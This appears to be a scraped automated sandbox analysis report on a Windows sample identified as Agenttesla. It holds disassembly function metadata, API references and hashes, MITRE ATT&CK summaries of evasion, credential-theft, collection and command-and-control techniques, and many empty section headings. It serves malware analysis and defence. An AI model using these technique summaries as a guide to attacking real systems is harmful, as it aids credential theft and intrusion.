Opcode ID: 760ff08d575cbe189caaf2f8284aa2ced4b9f82f191dbc2d600152298f1aa982
Instruction ID: 86e4af1ca0972e9efce2d7ee61bfb4623ccffe0f25e1aa7ecfe14901fff6ca5b
Opcode Fuzzy Hash: 760ff08d575cbe189caaf2f8284aa2ced4b9f82f191dbc2d600152298f1aa982
Instruction Fuzzy Hash: B4119671940B01DFEB209F36D84175ABBF0AF05318F10452FE49997292CB7899458F5D

Uniqueness

Uniqueness Score: -1.00%

Function 00440F60, Relevance: 7.5, APIs: 5, Instructions: 47COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00440F6C

Part of subcall function 0043F19C: __getptd_noexit.LIBCMT ref: 0043F19F
Part of subcall function 0043F19C: __amsg_exit.LIBCMT ref: 0043F1AC

__amsg_exit.LIBCMT ref: 00440F8C
__lock.LIBCMT ref: 00440F9C
InterlockedDecrement.KERNEL32(?), ref: 00440FB9
InterlockedIncrement.KERNEL32(007E2B90), ref: 00440FE4

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 2c616dfdfe2b3b0f4fa56f413c9e7892ce289759e379619b865f9694a4594d68
Instruction ID: 9526eca4fd775d6c1af8ece24d966bef2bef708e5b618dfb79aa49901e553a3a
Opcode Fuzzy Hash: 2c616dfdfe2b3b0f4fa56f413c9e7892ce289759e379619b865f9694a4594d68
Instruction Fuzzy Hash: 5901ED35E01A11ABFB31AB65A80175E7360AF05718F00402BE900A3281C77C6C6ACBDE

Uniqueness

Uniqueness Score: -1.00%

Function 0043F577, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0043F595

Part of subcall function 0043D445: __mtinitlocknum.LIBCMT ref: 0043D45B
Part of subcall function 0043D445: __amsg_exit.LIBCMT ref: 0043D467
Part of subcall function 0043D445: RtlEnterCriticalSection.NTDLL(?), ref: 0043D46F

___sbh_find_block.LIBCMT ref: 0043F5A0
___sbh_free_block.LIBCMT ref: 0043F5AF
HeapFree.KERNEL32(00000000,?,004466D0,0000000C,0043D426,00000000,00446600,0000000C,0043D460,?,?,?,00441525,00000004,004467D0,0000000C), ref: 0043F5DF
GetLastError.KERNEL32(?,00441525,00000004,004467D0,0000000C,0043F660,?,?,00000000,00000000,00000000,?,0043F14E,00000001,00000214), ref: 0043F5F0

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 827981389c18d20363fe1995ff821e51653d0af36e1228fbf0ced475b85ce1b6
Instruction ID: eed7a6a7dbc623e3b2c97ed40c08d57379deacbaba7e3b3aea03e71f9b32afee
Opcode Fuzzy Hash: 827981389c18d20363fe1995ff821e51653d0af36e1228fbf0ced475b85ce1b6
Instruction Fuzzy Hash: ED01A271D02701BADF207F72AC0A75E3AA49F19364F60616FF000A62D2CE3C89448A5D

Uniqueness

Uniqueness Score: -1.00%

Function 00440CC4, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00440CD0

Part of subcall function 0043F19C: __getptd_noexit.LIBCMT ref: 0043F19F
Part of subcall function 0043F19C: __amsg_exit.LIBCMT ref: 0043F1AC

__getptd.LIBCMT ref: 00440CE7
__amsg_exit.LIBCMT ref: 00440CF5
__lock.LIBCMT ref: 00440D05

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: d552cc60d76100c77751c096bf886955c606d4930e6c79d6de5067c399125dd7
Instruction ID: 1584bdbe595fe42c57fd0eb84b42861b871b66a2561c440ed007027fb1353d5d
Opcode Fuzzy Hash: d552cc60d76100c77751c096bf886955c606d4930e6c79d6de5067c399125dd7
Instruction Fuzzy Hash: CEF09032E40700CBFB20FBB6A40274E73A0AB45729F11465FE585972D1CB3CA8468A9E

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report mcsrXx9lfD.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Agenttesla

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

SMTP Packets

Code Manipulations

Function 00405C78, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Function 00457EFC, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 392
COMMON

Function 00405D84, Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Function 00444250, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 34
COMMON

Function 00457E74, Relevance: 1.5, APIs: 1, Instructions: 24
nativeCOMMON

Function 0044401C, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 103
registrylibraryloaderCOMMON

Function 004579E0, Relevance: 13.6, APIs: 9, Instructions: 130
windowregistryCOMMON

Function 00456DD0, Relevance: 10.6, APIs: 7, Instructions: 89
COMMON

Function 004576D8, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
windowCOMMON

Function 004565F4, Relevance: 6.1, APIs: 4, Instructions: 99
COMMON

Function 00401A78, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Function 00426A8C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Function 004569B0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 00401590, Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Function 004703F8, Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Function 0040728A, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Function 0040728C, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Function 00405A3C, Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Function 00401724, Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Function 0041CDB0, Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Function 00443C20, Relevance: 49.1, APIs: 15, Strings: 13, Instructions: 95
libraryloaderCOMMON

Function 00405AC0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136
stringlibraryfileCOMMON

Function 00454FF0, Relevance: 18.4, APIs: 12, Instructions: 407
windowCOMMON

Function 0044CA64, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 405
nativeCOMMONCrypto

Function 0043F680, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
windowCOMMON

Function 00452548, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 284
windowCOMMONCrypto

Function 004586A0, Relevance: 9.1, APIs: 6, Instructions: 86
windownativeCOMMON

Function 0043ED9C, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81
windowCOMMON

Function 004585F0, Relevance: 7.6, APIs: 5, Instructions: 59
nativewindowCOMMON

Function 00426BA4, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46
COMMON

Function 0045BDA0, Relevance: 6.2, APIs: 4, Instructions: 163
windowCOMMON

Function 00416D64, Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Function 0043372C, Relevance: 6.0, APIs: 4, Instructions: 46
sleepCOMMON

Function 0043CE20, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Function 0043258C, Relevance: 4.5, APIs: 3, Instructions: 43
clipboardCOMMON

Function 004574D0, Relevance: 4.5, APIs: 3, Instructions: 33
synchronizationthreadCOMMON

Function 004703B0, Relevance: 4.5, APIs: 3, Instructions: 18
timeCOMMON

Function 0043E4F4, Relevance: 3.1, APIs: 2, Instructions: 63
windowCOMMON

Function 00420594, Relevance: 3.0, APIs: 2, Instructions: 46
windowCOMMON

Function 0040ACF0, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Function 00408938, Relevance: 3.0, APIs: 2, Instructions: 33
fileCOMMON

Function 00408B02, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Function 0042E8BC, Relevance: 1.5, APIs: 1, Instructions: 41
nativeCOMMON

Function 00420B24, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Function 00409940, Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Function 0040998C, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Function 004207E0, Relevance: 37.7, APIs: 25, Instructions: 248
windowCOMMON

Function 00423F14, Relevance: 31.7, APIs: 21, Instructions: 194
windowCOMMON

Function 00424D70, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351
COMMON

Function 0046A130, Relevance: 23.0, APIs: 15, Instructions: 468
COMMON

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre